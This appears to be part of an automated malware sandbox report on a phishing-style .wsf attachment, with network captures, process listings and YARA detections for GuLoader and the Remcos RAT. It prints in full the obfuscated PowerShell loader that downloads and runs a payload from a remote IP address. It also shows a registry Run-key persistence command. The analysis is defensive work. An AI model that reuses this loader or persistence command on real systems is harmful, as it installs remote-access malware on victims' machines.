                                            Apr 20, 2024 16:05:38.091700077 CEST1289INData Raw: c1 0e 06 62 71 a7 3b 8b 9f 7a 58 32 f4 c9 53 2a 7b aa 52 43 f3 e6 2f c8 dc e4 53 4b ad a5 11 0b 6e 32 91 2e ad a8 19 a8 25 c7 bb 1f b6 0e 1f 7f bf 7d 9f 9c 41 60 8d d5 fe 38 b3 8a 03 0f 2f 0a 06 8c 75 2c bb ff 43 37 a1 ba bc 40 35 02 34 b0 a3 f2
                                            Data Ascii: bq;zX2S*{RC/SKn2.%}A`8/u,C7@54S^1 B0:P|m]N"?FzjF:?w2bEgcI@d]5;G9"1Xsm@A)'0{B6K,o


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.649721178.237.33.50805776C:\Program Files (x86)\Windows Mail\wab.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 20, 2024 16:05:40.946173906 CEST71OUTGET /json.gp HTTP/1.1
                                            Host: geoplugin.net
                                            Cache-Control: no-cache
                                            Apr 20, 2024 16:05:41.160156965 CEST1171INHTTP/1.1 200 OK
                                            date: Sat, 20 Apr 2024 14:05:41 GMT
                                            server: Apache
                                            content-length: 963
                                            content-type: application/json; charset=utf-8
                                            cache-control: public, max-age=300
                                            access-control-allow-origin: *
                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 61 72 69 65 74 74 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 47 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 34 2e 30 34 31 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 34 2e 35 30 35 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                            Data Ascii: { "geoplugin_request":"81.181.57.52", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Marietta", "geoplugin_region":"Georgia", "geoplugin_regionCode":"GA", "geoplugin_regionName":"Georgia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"524", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"34.0414", "geoplugin_longitude":"-84.5053", "geoplugin_locationAccuracyRadius":"1000", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:16:05:02
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rOferta_SKGNMECLemnedefinitionen353523577.wsf"
                                            Imagebase:0x7ff60af00000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:16:05:02
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:16:05:02
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:16:05:05
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
                                            Imagebase:0x7ff6fdba0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:16:05:10
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'Flex$B.rggJentlMatroAnkybSigraKommlSk,l:ChesNtripeImpodTugtlTernaBraig Pirt Mar=Lab.(StanTRidge Fres S mtTotr-We dPs laaNonetSov htame M.tr$Dis,Oevanv,heieTmm rOpstf F.oeDiseaRoomrRubefWarluSodalBa lnTviveEndos Pins Sth7supe9Gru.) U.d ');while (!$Nedlagt) {Bussemnd (Sarpedon ' For$CajugPiral rihoAnstbCampaRhodl and:tidsJ Fe eSissrDragnH stgpro,iDelstPolttPon eDocorVidesEksteTernnFor gSv.neSolen AnceMe a=Cog.$ B it SchrSrstu PepeRed, ') ;Bussemnd $fantasises;Bussemnd (Sarpedon 'StatS WortByggaxen.r ,tat Rej-PokeSTumol aueRefreSmaapOnom Lsm.4Demo ');Bussemnd (Sarpedon ',roi$Tyf gmuzzlAnfao.ptib SonaCocclS,iv:SyssNShrieMed dF,eklOmflaappegA.but lem=Raag(Pse.TConseAnnss Duetgast-DeliPFoneaKapitA.kehhusk Dy.k$ proODiskvImmueHundrSub,fmilieUninaHei rGoalf ,efu,rbelPensnNe rebedss.pers.osn7tach9Mona) De ') ;Bussemnd (Sarpedon ' Bis$ ontg cutlPoecojgerbTrekaDaimlRegr:SlgtS FruyGildn.ulpiTof,nTubbgYohisApadh NedaMnstlmisclLyseeBelerCommnDia,eTynd=B ne$EucrgAfstllunaoEndob YaraChail fe,:Ta,dKMor,abraveDeltmR.gnpBegrehelboSnipeAntir.uncnBygge Lav+Chad+Hypo%M rg$PereSFl pt StarRingeT,ppnSkbngStr eBestkIsraoDi.qr Hete rdnN ale Kap.BlokcTommoTempu UmanDdfdt Cam ') ;$skppeskn=$Strengekorene[$Syningshallerne];}Bussemnd (Sarpedon 'Shal$DespgCorol FodoNonpb AbdaSemilmoda: TviCFortoAbsemvi.upS,leoParanModieSupen KirtHi maChecl rav .os=Cory LaroGSlogeOenst Com-MiceCEl.aoBemjn ,nttLefteSt.mnTr.btOrds Ditm$AcoeOStrevEpiceJoggrudstfBereeVensaH,ndrH.idfalaruBetilViabnVindeR,ffscoprs,eka7Fore9 Fle ');Bussemnd (Sarpedon ' Uni$ mycgin slMiniolivebFl ea UnelTand:R.liO VisvIsoleDek.rSocisLnpaeC lln slisUdsgiZo.rbAfs.l.ugmeLdre Coun=Lave Marl[UndeSCreayG.nes ,fstPl.seNglem.lev..oluC .uboSovjn.onivCypre OxirPa,ttSkov]foed:Omsk: garFFordrPillo ThemAphoBOxycaJ,nnsButtePape6card4 .msSTjentEfterForsiCalan AntgWhos(Iagt$ KakCChanoHeuamUntrp Couo Ma nEgnseB.ugn Plat S.raForrl .om)Real ');Bussemnd (Sarpedon 'Invu$ bifg Su,lPar,oTritbparaaVejblAn e:GodtNcurioSkamnThi,d GeniJulelUnsiaEcontFrenaStrkbMattlOut e Hor Skor= Skj Dite[FornSThioyhiersDi.it lite Aurmford.Did TLayseDelixP.ritTomo. CorECon.n.lencPlotoFuncdPyrgi Fl nI.eagA.ti]Kryd:Star: lokABoobSParsCMo,eI Ly,IOpt,.PedeGRuthepanct StiSAurotPublr AmbiNonbnIch g Bef(Chyl$.andOSkyfvFrijePinkr .jes DiaeLouvn omps.amoi,houbDe tl B teIsoc)Genu ');Bussemnd (Sarpedon ' Pen$Provg.laylImproLibebTryka s rlInte:Cen DSkovaAscacoutftUbesy UnplAnaloMaimn EksovermmR,styLavi2Lu.r0Deni4Gul,=Stop$UredNMakaoGor.nK.lidRo.tiSy tlSo.aaNonitE,teaReprb NonlParaeN.bl.De isi.dau DiabStibsB.llt manr N,ni He nSureg Nem(Takk2 sti8Absa0Vire4,ami5Equi6Forl, Boo2 L.p7 The2 Kli2skgl5 .ag)Frui ');Bussemnd $Dactylonomy204;"
                                            Imagebase:0x690000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:16:05:11
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:16:05:28
                                            Start date:20/04/2024
                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                            Imagebase:0xfa0000
                                            File size:516'608 bytes
                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            General

                                            Target ID:11
                                            Start time:16:05:36
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
                                            Imagebase:0x1c0000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:16:05:36
                                            Start date:20/04/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:16:05:36
                                            Start date:20/04/2024
                                            Path:C:\Windows\SysWOW64\reg.exe
                                            Wow64 process (32bit):true
                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
                                            Imagebase:0x1d0000
                                            File size:59'392 bytes
                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FFD3489B1A6 Relevance: .5, Instructions: 485COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2664640595.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 197bf84baed8c0cb16243554287e95052de601543151b4a5e345775304056bb3
                                              • Instruction ID: 406a3dbe85ea09729b4e073b861f06d6dd359b00539b3bb340dc0e5e0cc08173
                                              • Opcode Fuzzy Hash: 197bf84baed8c0cb16243554287e95052de601543151b4a5e345775304056bb3
